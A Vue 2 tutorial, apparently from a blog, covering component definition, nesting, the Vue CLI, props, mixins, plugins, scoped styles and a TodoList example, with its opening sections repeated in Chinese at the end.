    template: `<div><h1>学校名称:{{name}}</h1><h1>学校地址:{{address}}</h1></div>`,
    data() {
      return {
        name: 'FJNU',
        address: 'Fuzhou'
      }
    }
  })

  const student = Vue.extend({
    template: `<div><h1>学生名称:{{name}}</h1><h1>学生年龄:{{age}}</h1></div>`,
    data() {
      return {
        name: '古尔丹',
        age: 16
      }
    }
  })

  const hello = Vue.extend({
    template: `<h1>你好,旅行者。</h1>`
  })

  Vue.component('hello', hello) // global registration
  // create the Vue instance
  const vm = new Vue({
    el: '#root',
    data: {
      msg: '你好啊朋友!'
    },
    components: {
      school, // shorthand for school: school
      student
    }
  })
</script>

055 A few caveats about components

Caveats:

1. About component names:

  • One word:

    First style (lowercase first letter): school

    Second style (uppercase first letter): School

  • Several words:

    First style (kebab-case): my-school

    Second style (CamelCase): MySchool (requires the Vue CLI)

  • Notes

    • Avoid names of existing HTML elements; for example, neither h2 nor H2 works.
    • The name config option sets the name the component shows in the devtools.

2. About component tags:
  First style: <school></school>

  Second style: <school/>

  Note: without the CLI scaffolding, <school/> prevents the components after it from rendering.

3. A shorthand:
  const school = Vue.extend(options) can be shortened to const school = options

056 Nesting components

Build the following component structure:

classDiagram
    class Student {
        +String name
        +int age
        +data()
    }
    class School {
        +String name
        +String address
        +data()
        +components: Student
    }
    class Hello {
        +String template
    }
    class App {
        +String template
        +components: Hello, School
    }
    class VueInstance {
        +components: App
    }
    Student --> School : nested
    School --> App : used in
    Hello --> App : used in
    App --> VueInstance : root component
<div id="root"></div>

<script type="text/javascript">
  Vue.config.productionTip = false // stop Vue from printing the production tip on startup
  // create the components
  const student = Vue.extend({
    template: `<div><h1>学生名称:{{name}}</h1><h1>学生年龄:{{age}}</h1></div>`,
    data() {
      return {
        name: '古尔丹',
        age: 16
      }
    },
  })

  const school = Vue.extend({
    template: `<div>
      <h1>学校名称:{{name}}</h1>
      <h1>学校地址:{{address}}</h1>
      <student></student>
    </div>`,
    data() {
      return {
        name: 'FJNU',
        address: 'Fuzhou'
      }
    },
    components: {
      student
    }
  })

  const hello = Vue.extend({
    template: `<h1>你好,旅行者。</h1>`
  })

  const app = Vue.extend({
    template: `<div><hello/><school/></div>`,
    components: {
      school,
      hello
    }
  })

  // create the Vue instance
  const vm = new Vue({
    el: '#root',
    template: `<app/>`,
    components: {
      app,
    }
  })
</script>

057 The VueComponent constructor & 058 Vue instances vs. component instances

About VueComponent:

1. The school component is essentially a constructor named VueComponent; it is not written by the programmer but generated by Vue.extend.

2. We only write <school/> or <school></school>; when Vue parses it, it creates the school component's instance object for us, i.e. Vue executes new VueComponent(options).

3. Note in particular: every call to Vue.extend returns a brand-new VueComponent!!!

4. About what this points to:

  • In a component's config:
    the functions in data, methods, watch, and computed all have this bound to the VueComponent instance object
  • In the new Vue(options) config:
    the functions in data, methods, watch, and computed all have this bound to the Vue instance object

5. A VueComponent instance object is abbreviated vc from here on (also called a component instance object).

  A Vue instance object is abbreviated vm.

059 An important built-in relationship

In JavaScript, the "explicit prototype property" and the "implicit prototype property" are two distinct concepts tied to object inheritance and the prototype chain. To understand them, we first need to understand the prototype chain and how inheritance is achieved through prototypes.

1. The implicit prototype property (__proto__)

Definition:

Every JavaScript object internally carries an implicit __proto__ property. It points to the prototype object of the object's constructor (i.e. the object's "parent").

Characteristics:
• __proto__ is not declared explicitly; the JavaScript engine adds it automatically as a hidden property of every object.
• __proto__ links an object to its constructor's prototype object and is the basis of prototype-chain inheritance.
• Every object has a prototype object, which in turn has its own prototype, forming the prototype chain. When a property or method is accessed, JavaScript walks up this chain.
Example:
function Person(name) {
  this.name = name;
}

Person.prototype.sayHello = function() {
  console.log('Hello, ' + this.name);
};

const p1 = new Person('John');
console.log(p1.__proto__ === Person.prototype); // true

In the code above, p1.__proto__ is Person.prototype, i.e. the prototype of the p1 object.

2. The explicit prototype property (prototype)

Definition:

The explicit prototype property is the prototype property of a constructor (class). Every function object has a prototype property that points to the constructor's prototype object; properties and methods shared by all instances of the constructor are defined through it.

Characteristics:
• A constructor's prototype property defines the methods and properties shared by all its instance objects.
• When an instance is created with the constructor, the instance's __proto__ points to the constructor's prototype.
Example:
function Person(name) {
  this.name = name;
}

Person.prototype.sayHello = function() {
  console.log('Hello, ' + this.name);
};

const p1 = new Person('John');
const p2 = new Person('Jane');
p1.sayHello(); // "Hello, John"
p2.sayHello(); // "Hello, Jane"

In this example, Person.prototype is the prototype object of the Person function; sayHello is defined on it, and the p1 and p2 instances reach Person.prototype through __proto__ and so share the method.

Summary

• Implicit prototype property (__proto__): every object has it automatically; it points to the prototype of the object's constructor.
• Explicit prototype property (prototype): every constructor has it automatically; it points to an object holding the properties and methods shared by all instances created through that constructor.

Through these two prototype properties, JavaScript implements prototype-chain inheritance.

(figure: the built-in relationship VueComponent.prototype.__proto__ === Vue.prototype, which lets component instances reach the methods on Vue's prototype)

III. Single-File Components

060 Single-file components & 061 Creating a Vue CLI project & 062 The scaffold structure

The Vue CLI is Vue's official standardized development tool (development platform).

Install:

npm install -g @vue/cli

Create a project (choose Vue 2):

vue create vue_test

Start the dev server:

cd vue_test
npm run serve


Babel is a widely used JavaScript compiler, mainly for transforming modern JavaScript (ES6+) into backward-compatible versions that run in older browsers and environments. Its main capabilities:

1. Syntax transforms: converts new JavaScript syntax (arrow functions, modules, etc.) into older compatible syntax.
2. Polyfills: via plugins (such as @babel/preset-env with core-js), adds support for new APIs (Promise, Array.prototype.includes, etc.).
3. TypeScript support: Babel can process TypeScript code and compile it to plain JavaScript.
4. React support: with @babel/preset-react, Babel compiles JSX syntax.
5. Custom plugins: Babel's behavior can be extended by writing plugins.

Babel is usually used inside build tools (such as Webpack or Rollup) together with other tooling for modern development.

ESLint is a static code analysis tool for JavaScript that finds problems in code and helps developers keep a consistent style. Its main features:

1. Finding problems: syntax errors, potential issues (such as undefined variables), and best-practice suggestions.
2. Code style: checks formatting (indentation, quotes, semicolons, etc.) and enforces a consistent team style.
3. Customizable rules: specific rules can be enabled or disabled through a config file (such as .eslintrc).
4. Plugin ecosystem: community plugins (React, Vue, etc.) check framework-specific code.
5. Auto-fixing: ESLint can automatically fix some simple problems, such as inconsistent formatting.
6. Editor integration: with editor plugins (e.g. for VS Code), problems show up as you type.

ESLint is typically used together with Babel or TypeScript during development and in CI/CD pipelines to keep code quality high.

Aspect | Babel | ESLint
Purpose | transforms code to support older environments | analyzes code, enforcing consistency and quality
Goal | compile modern JavaScript to compatible versions | find potential errors and style problems
When it runs | at build time | during development or code review
Extensibility | plugins and presets for complex syntax transforms | plugins for many frameworks and style checks

Summary

• Babel is the toolchain's "compiler": it makes sure the code runs in the target environment.
• ESLint is the toolchain's "inspector": it keeps the code high-quality and maintainable.

In VS Code, press Ctrl + ` to open the terminal.

Adjust the project's file structure:

• vue_test
  • node_modules
  • public
    • favicon.ico
    • index.html
  • src
    • assets
      • logo.png
    • components
      • School.vue
      • Student.vue
    • App.vue
    • main.js

Edit the file contents:

<!DOCTYPE html>
<html lang="">
  <head>
    <meta charset="utf-8">
    <!-- IE-specific setting: make IE render the page at its highest rendering level -->
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- enable the ideal viewport on mobile -->
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <!-- tab icon -->
    <link rel="icon" href="<%= BASE_URL %>favicon.ico">
    <!-- page title -->
    <title><%= htmlWebpackPlugin.options.title %></title>
  </head>
  <body>
    <!-- when the browser does not support js, the elements inside noscript are rendered -->
    <noscript>
      <strong>We're sorry but <%= htmlWebpackPlugin.options.title %> doesn't work properly without JavaScript enabled. Please enable it to continue.</strong>
    </noscript>
    <!-- container -->
    <div id="app"></div>
    <!-- built files will be auto injected -->
  </body>
</html>
<template>
  <div class="demo">
    <h2>学校名称:{{name}}</h2>
    <h2>学校地址:{{address}}</h2>
    <button @click="showName">点我提示学校名</button>
  </div>
</template>

<script>
/* eslint-disable vue/multi-word-component-names */
export default {
  name: 'School',
  data() {
    return {
      name: 'FJNU',
      address: 'Fuzhou'
    }
  },
  methods: {
    showName() {
      alert(this.name)
    }
  }
}
</script>

<style>
.demo {
  background-color: orange;
}
</style>
<template>
  <div>
    <h2>学生姓名:{{name}}</h2>
    <h2>学生年龄:{{age}}</h2>
  </div>
</template>

<script>
/* eslint-disable vue/multi-word-component-names */
export default {
  name: 'Student',
  data() {
    return {
      name: '张三',
      age: 18
    }
  }
}
</script>
<template>
  <div>
    <img src="./assets/logo.png" alt="logo">
    <School></School>
    <Student></Student>
  </div>
</template>

<script>
import School from './components/School.vue';
import Student from './components/Student.vue';

export default {
  name: 'App',
  components: {
    School,
    Student
  }
}
</script>
// this file is the entry point of the whole project

// import Vue
import Vue from 'vue'
// import the App component, the parent of all components
import App from './App.vue'
// turn off Vue's production tip
Vue.config.productionTip = false

// create the Vue instance object vm
new Vue({
  el: '#app',
  render: h => h(App),
})

Compile and serve with:

npm run serve


063 The render function

Why does main.js use:

// create the Vue instance object vm
new Vue({
  el: '#app',
  render: h => h(App),
})

rather than:

new Vue({
  el: '#app',
  template: `<app></app>`
})

? Because main.js imports a build of Vue that is not the full build.

About the different Vue builds:

1. vue.js vs. vue.runtime.xxx.js:
  • vue.js is the full build: core functionality plus the template compiler.
  • vue.runtime.xxx.js is the runtime-only build: core functionality, no template compiler.
2. Since vue.runtime.xxx.js has no template compiler, the template config option cannot be used; instead, the createElement function received by render specifies the content.

064 Changing the default config

Dump the configuration with:
vue inspect > output.js

Defaults can also be overridden via vue.config.js:

module.exports = {
  pages: {
    index: {
      // entry point
      entry: 'src/XXX.js'
    }
  }
}

065 The ref attribute

1. Registers reference information for an element or child component (the replacement for id)

2. On an html tag it yields the real DOM element; on a component tag it yields the component instance object (vc)

3. Usage:

  Tagging: <h1 ref="xxx">.....</h1> or <School ref="xxx"></School>

  Reading: this.$refs.xxx


<template>
  <div>
    <h1 v-text="msg" ref="title"></h1>
    <button ref="btn" @click="showDOM">点我输出信息</button>
    <School ref="sch"/>
  </div>
</template>

<script>
// import the School component
import School from './components/School.vue';

export default {
  name: 'App',
  components: {School},
  data() {
    return {
      msg: '你好啊朋友!'
    }
  },
  methods: {
    showDOM() {
      console.log(this.$refs.title)
      console.log(this.$refs.btn)
      console.log(this.$refs.sch)
    }
  },
}
</script>

066 The props config

The props config option:

Purpose: lets a component receive data passed in from outside

1. Passing the data:

  <Demo name="xxx"/>

2. Receiving the data:

  First form (receive only):

  props: ['name']

  Second form (restrict the type):

  props: {name: Number}

  Third form (restrict the type, require presence, give a default):

  props: {
    name: {
      type: String,    // type
      required: true,  // required
      default: '老王'  // default value
    }
  }

Note: props are read-only. Vue watches for modifications to props and warns if you mutate one; if the business logic really requires a change, copy the prop's content into data and modify the copy.

<template>
  <div>
    <Student name="吉安娜" sex="女" :age="18"></Student>
    <hr>
    <Student name="古尔丹" sex="女" :age="30"></Student>
  </div>
</template>

<script>
import Student from './components/Student.vue'

export default {
  name: 'App',
  components: {
    Student
  }
}
</script>
<template>
  <div>
    <h1>{{ msg }}</h1>
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    <h2>学生年龄:{{ age }}</h2>
  </div>
</template>

<script>
/* eslint-disable vue/multi-word-component-names */
export default {
  name: 'Student',
  data() {
    console.log(this)
    return {
      msg: '你好,旅行者。'
    }
  },
  props: ['name', 'age', 'sex']
}
</script>

067 Mixins

If several Vue components need to share the same options, you can use a mixin and keep the shared part in a js file.

export const hunhe = {
  methods: {
    showName() {
      alert(this.name)
    }
  },
  mounted() {
    console.log('嗬,你好!')
  }
}

Local mixins

Below, the mixin is applied inside the Student.vue and School.vue files.

<template>
  <div>
    <Student></Student>
    <hr>
    <School></School>
  </div>
</template>

<script>
import Student from './components/Student.vue'
import School from './components/School.vue'

export default {
  name: 'App',
  components: {
    Student,
    School
  }
}
</script>
<template>
  <div>
    <h2 @click="showName">学生名称:{{name}}</h2>
    <h2>学生性别:{{sex}}</h2>
  </div>
</template>

<script>
import {hunhe} from '../mixin.js'
/* eslint-disable vue/multi-word-component-names */
export default {
  name: 'Student',
  data() {
    return {
      name: '古尔丹',
      sex: 'Male'
    }
  },
  mixins: [hunhe]
}
</script>
<template>
  <div>
    <h2 @click="showName">学校名称:{{name}}</h2>
    <h2>学校地址:{{address}}</h2>
  </div>
</template>

<script>
import {hunhe} from '../mixin.js'
/* eslint-disable vue/multi-word-component-names */
export default {
  name: 'School',
  data() {
    return {
      name: 'FJNU',
      address: 'Fuzhou'
    }
  },
  mixins: [hunhe]
}
</script>

Global mixins

Below, the mixin is applied in main.js.

import Vue from 'vue'
import App from './App.vue'
import { hunhe } from './mixin'

Vue.config.productionTip = false
Vue.mixin(hunhe)

new Vue({
  render: h => h(App),
}).$mount('#app')
<template>
  <div>
    <h2 @click="showName">学生名称:{{name}}</h2>
    <h2>学生性别:{{sex}}</h2>
  </div>
</template>

<script>
/* eslint-disable vue/multi-word-component-names */
export default {
  name: 'Student',
  data() {
    return {
      name: '古尔丹',
      sex: 'Male'
    }
  },
}
</script>
<template>
  <div>
    <h2 @click="showName">学校名称:{{name}}</h2>
    <h2>学校地址:{{address}}</h2>
  </div>
</template>

<script>
/* eslint-disable vue/multi-word-component-names */
export default {
  name: 'School',
  data() {
    return {
      name: 'FJNU',
      address: 'Fuzhou'
    }
  },
}
</script>

068 Plugins

Purpose: to enhance Vue.

Essence: an object containing an install method; install's first parameter is Vue, and the later parameters are data passed in by the plugin's users.

Defining a plugin:

theObject.install = function(Vue, options) {
  // 1. add a global filter (removed in Vue 3)
  Vue.filter(....)
  // 2. add a global directive
  Vue.directive(....)
  // 3. configure a global mixin
  Vue.mixin(....)
  // 4. add instance methods
  Vue.prototype.$myMethod = function(){...}
  Vue.prototype.$myProperty = xxxx
}

Using a plugin: Vue.use()

// import Vue
import Vue from 'vue'
// import App
import App from './App.vue'
// import the plugin
import plugins from './plugins'
// turn off Vue's production tip
Vue.config.productionTip = false

// apply (use) the plugin
Vue.use(plugins, 1, 2, 3)
// create the vm
new Vue({
  el: '#app',
  render: h => h(App)
})
export default {
  install(Vue, x, y, z) {
    console.log(x, y, z)
    // global filter
    Vue.filter('mySlice', function (value) {
      return value.slice(0, 4)
    })

    // define a global directive
    Vue.directive('fbind', {
      // called when the directive is first bound to the element
      bind(element, binding) {
        element.value = binding.value
      },
      // called when the element is inserted into the page
      inserted(element) {
        element.focus()
      },
      // called when the template containing the directive is re-parsed
      update(element, binding) {
        element.value = binding.value
      }
    })

    // configure a mixin
    Vue.mixin({
      data() {
        return {
          x: 100,
          y: 200
        }
      },
    })

    // add a method to Vue's prototype (both vm and vc can then use it)
    Vue.prototype.hello = () => { alert('你好啊') }
  }
}
<template>
  <div>
    <h2>学校名称:{{ name | mySlice }}</h2>
    <h2>学校地址:{{ address }}</h2>
    <button @click="test">点我测试一个hello方法</button>
  </div>
</template>

<script>
/* eslint-disable vue/multi-word-component-names */
export default {
  name: 'School',
  data() {
    return {
      name: '尚硅谷atguigu',
      address: '北京',
    }
  },
  methods: {
    test() {
      this.hello()
    }
  },
}
</script>
<template>
  <div>
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    <input type="text" v-fbind:value="name">
  </div>
</template>

<script>
/* eslint-disable vue/multi-word-component-names */
export default {
  name: 'Student',
  data() {
    return {
      name: '张三',
      sex: '男'
    }
  },
}
</script>


069 scoped styles

In <style lang="less" scoped>, lang selects the style language (less here), and scoped limits the style's effect to this file.

// import Vue
import Vue from 'vue'
// import App
import App from './App.vue'
// turn off Vue's production tip
Vue.config.productionTip = false

// create the vm
new Vue({
  el: '#app',
  render: h => h(App)
})
<template>
  <div class="demo">
    <h2 class="school">学校名称:{{ name }}</h2>
    <h2>学校地址:{{ address }}</h2>
  </div>
</template>

<script>
/* eslint-disable vue/multi-word-component-names */
export default {
  name: 'School',
  data() {
    return {
      name: '河百带学',
      address: '河北保定',
    }
  },
}
</script>

<style lang="less" scoped>
.demo {
  background-color: orange;
  .school {
    font-size: larger;
  }
}
</style>
<template>
  <div class="demo">
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
  </div>
</template>

<script>
/* eslint-disable vue/multi-word-component-names */
export default {
  name: 'Student',
  data() {
    return {
      name: '张三',
      sex: '男'
    }
  },
}
</script>

<style lang="less" scoped>
.demo {
  background-color: skyblue;
}
</style>

070-077 The TodoList example

1. Component-based coding workflow:

  • Split out static components: split by functionality, and don't let names clash with html elements

  • Implement dynamic components: think about where data should live; is it used by one component or by several:

    • Used by one component: keep it on that component.
    • Used by several components: put it on their closest common parent (state lifting)
    • Implement the interactions: start from binding events.

2. props are suitable for:

  • parent ==> child communication
  • child ==> parent communication (the parent must hand the child a function first)
  • When using v-model remember: the value bound by v-model must not be a prop, because props must not be mutated!
  • If a prop is an object, Vue does not warn when you mutate its properties, but doing so is not recommended.


• The parent component organizes the whole TodoList structure. All the data lives in todos inside data().
• The functions that operate on todos also live in the parent component.
<template>
  <div id="root">
    <div class="todo-container">
      <div class="todo-wrap">
        <MyHeader :addTodo="addTodo" />
        <MyList :todos="todos" :checkTodo="checkTodo" :deleteTodo="deleteTodo" />
        <MyFooter :todos="todos" :checkAllTodo="checkAllTodo" :clearAllTodo="clearAllTodo" />
      </div>
    </div>
  </div>
</template>

<script>
import MyHeader from './components/MyHeader'
import MyList from './components/MyList'
import MyFooter from './components/MyFooter.vue'

export default {
  name: 'App',
  components: { MyHeader, MyList, MyFooter },
  data() {
    return {
      // todos is used by both the MyHeader and MyFooter components, so it lives in App (state lifting)
      todos: [
        { id: '001', title: '抽烟', done: true },
        { id: '002', title: '喝酒', done: false },
        { id: '003', title: '开车', done: true }
      ]
    }
  },
  methods: {
    // add a todo
    addTodo(todoObj) {
      this.todos.unshift(todoObj)
    },
    // check or uncheck a todo
    checkTodo(id) {
      this.todos.forEach((todo) => {
        if (todo.id === id) todo.done = !todo.done
      })
    },
    // delete a todo
    deleteTodo(id) {
      this.todos = this.todos.filter(todo => todo.id !== id)
    },
    // check or uncheck all
    checkAllTodo(done) {
      this.todos.forEach((todo) => {
        todo.done = done
      })
    },
    // clear all completed todos
    clearAllTodo() {
      this.todos = this.todos.filter((todo) => {
        return !todo.done
      })
    }
  }
}
</script>

<style>
/*base*/
body {
  background: #fff;
}

.btn {
  display: inline-block;
  padding: 4px 12px;
  margin-bottom: 0;
  font-size: 14px;
  line-height: 20px;
  text-align: center;
  vertical-align: middle;
  cursor: pointer;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);
  border-radius: 4px;
}

.btn-danger {
  color: #fff;
  background-color: #da4f49;
  border: 1px solid #bd362f;
}

.btn-danger:hover {
  color: #fff;
  background-color: #bd362f;
}

.btn:focus {
  outline: none;
}

.todo-container {
  width: 600px;
  margin: 0 auto;
}

.todo-container .todo-wrap {
  padding: 10px;
  border: 1px solid #ddd;
  border-radius: 5px;
}
</style>
• Use v-for to create the todoObj items so the list shows multiple entries.

• Use props to receive the data App passes down, moving data between components.

<template>
  <ul class="todo-main">
    <MyItem v-for="todoObj in todos" :key="todoObj.id" :todo="todoObj" :checkTodo="checkTodo"
      :deleteTodo="deleteTodo" />
  </ul>
</template>

<script>
import MyItem from './MyItem'

export default {
  name: 'MyList',
  components: { MyItem },
  // declare the data received from App: todos is used here, while checkTodo and deleteTodo are for the child MyItem
  props: ['todos', 'checkTodo', 'deleteTodo']
}
</script>

<style scoped>
/*main*/
.todo-main {
  margin-left: 0px;
  border: 1px solid #ddd;
  border-radius: 2px;
  padding: 0px;
}

.todo-empty {
  height: 40px;
  line-height: 40px;
  border: 1px solid #ddd;
  border-radius: 2px;
  padding-left: 5px;
  margin-top: 10px;
}
</style>
<template>
  <li>
    <label>
      <input type="checkbox" :checked="todo.done" @change="handleCheck(todo.id)"/>
      <!-- the following also works, but is not recommended because it mutates a prop -->
      <!-- <input type="checkbox" v-model="todo.done"/> -->
      <span>{{todo.title}}</span>
    </label>
    <button class="btn btn-danger" @click="handleDelete(todo.id)">删除</button>
  </li>
</template>

<script>
export default {
  name: 'MyItem',
  // declare the received todo, checkTodo, deleteTodo
  props: ['todo', 'checkTodo', 'deleteTodo'],
  methods: {
    // check or uncheck
    handleCheck(id) {
      // tell the App component to negate the done value of the matching todo
      this.checkTodo(id)
    },
    // delete
    handleDelete(id) {
      if (confirm('确定删除吗?')) {
        // tell the App component to delete the matching todo
        this.deleteTodo(id)
      }
    }
  },
}
</script>

<style scoped>
/*item*/
li {
  list-style: none;
  height: 36px;
  line-height: 36px;
  padding: 0 5px;
  border-bottom: 1px solid #ddd;
}

li label {
  float: left;
  cursor: pointer;
}

li label li input {
  vertical-align: middle;
  margin-right: 6px;
  position: relative;
  top: -1px;
}

li button {
  float: right;
  display: none;
  margin-top: 3px;
}

li:before {
  content: initial;
}

li:last-child {
  border-bottom: none;
}

li:hover{
  background-color: #ddd;
}

li:hover button{
  display: block;
}
</style>
<template>
  <div class="todo-header">
    <input type="text" placeholder="请输入你的任务名称,按回车键确认" v-model="title" @keyup.enter="add" />
  </div>
</template>

<script>
import { nanoid } from 'nanoid'
export default {
  name: 'MyHeader',
  // receive addTodo passed down from App
  props: ['addTodo'],
  data() {
    return {
      // collect the title the user types
      title: ''
    }
  },
  methods: {
    add() {
      // validate the input
      if (!this.title.trim()) return alert('输入不能为空')
      // wrap the input in a todo object
      const todoObj = { id: nanoid(), title: this.title, done: false }
      // tell the App component to add the todo object
      this.addTodo(todoObj)
      // clear the input
      this.title = ''
    }
  },
}
</script>

<style scoped>
/*header*/
.todo-header input {
  width: 560px;
  height: 28px;
  font-size: 14px;
  border: 1px solid #ccc;
  border-radius: 4px;
  padding: 4px 7px;
}

.todo-header input:focus {
  outline: none;
  border-color: rgba(82, 168, 236, 0.8);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 8px rgba(82, 168, 236, 0.6);
}
</style>
<template>
  <div class="todo-footer" v-show="total">
    <label>
      <!-- <input type="checkbox" :checked="isAll" @change="checkAll"/> -->
      <input type="checkbox" v-model="isAll"/>
    </label>
    <span>
      <span>已完成{{doneTotal}}</span> / 全部{{total}}
    </span>
    <button class="btn btn-danger" @click="clearAll">清除已完成任务</button>
  </div>
</template>

<script>
export default {
  name: 'MyFooter',
  props: ['todos', 'checkAllTodo', 'clearAllTodo'],
  computed: {
    // total count
    total() {
      return this.todos.length
    },
    // completed count
    doneTotal() {
      // conditional counting with reduce
      /* const x = this.todos.reduce((pre, current) => {
        console.log('@', pre, current)
        return pre + (current.done ? 1 : 0)
      }, 0) */
      // shorthand
      return this.todos.reduce((pre, todo) => pre + (todo.done ? 1 : 0), 0)
    },
    // controls the select-all checkbox
    isAll: {
      // whether the select-all checkbox is checked
      get() {
        return this.doneTotal === this.total && this.total > 0
      },
      // set is called when isAll is assigned to
      set(value) {
        this.checkAllTodo(value)
      }
    }
  },
  methods: {
    /* checkAll(e) {
      this.checkAllTodo(e.target.checked)
    } */
    // clear all completed todos
    clearAll() {
      this.clearAllTodo()
    }
  },
}
</script>

<style scoped>
/*footer*/
.todo-footer {
  height: 40px;
  line-height: 40px;
  padding-left: 6px;
  margin-top: 5px;
}

.todo-footer label {
  display: inline-block;
  margin-right: 20px;
  cursor: pointer;
}

.todo-footer label input {
  position: relative;
  top: -1px;
  vertical-align: middle;
  margin-right: 5px;
}

.todo-footer button {
  float: right;
  margin-top: 5px;
}
</style>
    graph TD  A[App.vue]  B[MyHeader.vue]  C[MyFooter.vue]  D[MyList.vue]  E[MyItem.vue]  A -->|addTodo| B  A -->|todos, checkAllTodo, clearAllTodo| C  A -->|todos, checkTodo, deleteTodo| D  D -->|todo, checkTodo, deleteTodo| E
    ]]>
    + 资源

    正文

    一、模块与组件、模块化与组件化

    053 对组件的理解


    模块

    1. 理解:向外提供特定功能的 js 程序,一般就是一个 js 文件
    2. 为什么:js 文件很多很复杂
    3. 作用:复用 js,简化 js 的编写,提高 js 运行效率

    组件

    1. 理解:用来实现局部(特定)功能效果的代码集合 (html/css/js/image…)

    2. 为什么:一个界面的功能很复杂

    3. 作用:复用编码,简化项目编码,提高运行效率

    模块化

当应用中的 js 都以模块来编写时,这个应用就是一个模块化的应用。

    组件化

当应用中的功能都以组件的方式来编写时,这个应用就是一个组件化的应用。

    二、非单文件组件

    054 非单文件组件

    Vue 中使用组件的三大步骤:

    • 定义组件(创建组件)

    • 注册组件

    • 使用组件(写组件标签)

    一、如何定义一个组件?

使用 Vue.extend(options) 创建,其中 options 和 new Vue(options) 时传入的那个 options 几乎一样,但也有点区别:

    ​区别如下:

    • el 不要写,为什么?
      • 最终所有的组件都要经过一个 vm 的管理,由 vm 中的 el 决定服务哪个容器。
    • data 必须写成函数,为什么?
  • 避免组件被复用时,数据存在引用关系(见下方示例)。
    • 备注:使用 template 可以配置组件结构。
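
A minimal sketch (plain JavaScript, outside Vue) of the reasoning above: if data were a shared object, every reused component instance would mutate the same reference, while a factory function hands each instance its own copy. All names here are illustrative:

// data as a shared object: both "instances" point at the same reference
const shared = { count: 0 }
const compA = { data: shared }
const compB = { data: shared }
compA.data.count++
console.log(compB.data.count) // 1 — compB is affected by compA

// data as a factory function: each call returns a fresh object
const dataFn = () => ({ count: 0 })
const compC = { data: dataFn() }
const compD = { data: dataFn() }
compC.data.count++
console.log(compD.data.count) // 0 — instances stay independent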

    二、如何注册组件?

    • 局部注册:靠 new Vue 的时候传入 components 选项
    • 全局注册:Vue.component('组件名', 组件)

    三、编写组件标签:

    • <school></school>
    <div id="root">
    <hello></hello>
    <hr>
    <h1>{{msg}}</h1>
    <school></school>
    <hr>
    <student></student>
    </div>
    <div id="root2">
    <hello></hello>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建组件
    const school = Vue.extend({
    template: `<div><h1>学校名称:{{name}}</h1><h1>学校地址:{{address}}</h1></div>`,
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    }
    })

    const student = Vue.extend({
    template: `<div><h1>学生名称:{{name}}</h1><h1>学生年龄:{{age}}</h1></div>`,
    data() {
    return {
    name: '古尔丹',
    age: 16
    }
    }
    })

    const hello = Vue.extend({
    template: `<h1>你好,旅行者。</h1>`
    })

    Vue.component('hello', hello) // 全局注册
    // 创建 Vue 实例
    const vm = new Vue({
    el: '#root',
    data: {
    msg: '你好啊朋友!'
    },
    components: {
    school, // 相当于 school: school
    student
    }
    })
    </script>

    055 组件的几个注意点

    几个注意点:

    1. 关于组件名:

      • 一个单词组成:

        第一种写法(首字母小写):school

        第二种写法(首字母大写):School

      • 多个单词组成:

        第一种写法(kebab-case 命名):my-school

第二种写法(PascalCase,大驼峰命名):MySchool(需要 Vue 脚手架支持)

      • 备注

• 组件名尽可能回避 HTML 中已有的元素名称,例如:h2 和 H2 都不行。
        • 可以使用 name 配置项指定组件在开发者工具中呈现的名字。
    2. 关于组件标签:
      第一种写法:<school></school>

      第二种写法:<school/>

备注:不使用脚手架时,<school/> 会导致后续组件不能渲染。

    3. 一个简写方式:
      const school = Vue.extend(options) 可简写为:const school = options
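
A small sketch of this shorthand (names illustrative): when a plain options object is registered, Vue calls Vue.extend on it internally, so the two components below behave identically:

// Full form: create the VueComponent constructor explicitly
const school = Vue.extend({
  template: `<h2>{{name}}</h2>`,
  data() { return { name: 'FJNU' } }
})

// Shorthand: register the options object directly;
// Vue applies Vue.extend for us at registration time
const school2 = {
  template: `<h2>{{name}}</h2>`,
  data() { return { name: 'FJNU' } }
}

new Vue({
  el: '#root',
  components: { school, school2 }
})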

    056 组件的嵌套

    ​建立如下的组件结构:

classDiagram
    class Student {
        +String name
        +int age
        +data()
    }
    class School {
        +String name
        +String address
        +data()
        +components: Student
    }
    class Hello {
        +String template
    }
    class App {
        +String template
        +components: Hello, School
    }
    class VueInstance {
        +components: App
    }
    Student --> School : nested
    School --> App : used in
    Hello --> App : used in
    App --> VueInstance : root component
    <div id="root"></div>

    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建组件
    const student = Vue.extend({
    template: `<div><h1>学生名称:{{name}}</h1><h1>学生年龄:{{age}}</h1></div>`,
    data() {
    return {
    name: '古尔丹',
    age: 16
    }
    },
    })

    const school = Vue.extend({
    template: `<div>
    <h1>学校名称:{{name}}</h1>
    <h1>学校地址:{{address}}</h1>
    <student></student>
    </div>`,
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    components: {
    student
    }
    })

    const hello = Vue.extend({
    template: `<h1>你好,旅行者。</h1>`
    })

    const app = Vue.extend({
    template: `<div><hello/><school/></div>`,
    components: {
    school,
    hello
    }
    })

    // 创建 Vue 实例
    const vm = new Vue({
    el: '#root',
    template: `<app/>`,
    components: {
    app,
    }
    })
    </script>

    057 VueComponent 构造函数 & 058 Vue 实例与组件实例

    关于 VueComponent

1. school 组件本质是一个名为 VueComponent 的构造函数,且不是程序员定义的,是 Vue.extend 生成的。

2. 我们只需要写 <school/> 或 <school></school>,Vue 解析时会帮我们创建 school 组件的实例对象,即 Vue 帮我们执行的:new VueComponent(options)。

3. 特别注意:每次调用 Vue.extend,返回的都是一个全新的 VueComponent!!!

    4. 关于 this 指向:

      • 组件配置中:
data 函数、methods 中的函数、watch 中的函数、computed 中的函数,它们的 this 均是 VueComponent 实例对象。
      • new Vue(options) 配置中:
        data 函数、methods 中的函数、watch 中的函数、computed 中的函数 它们的 this 均是 Vue 实例对象
    5. VueComponent 的实例对象,以后简称 vc(也可称之为:组件实例对象)。

      Vue 的实例对象,以后简称 vm

    059 一个重要的内置关系

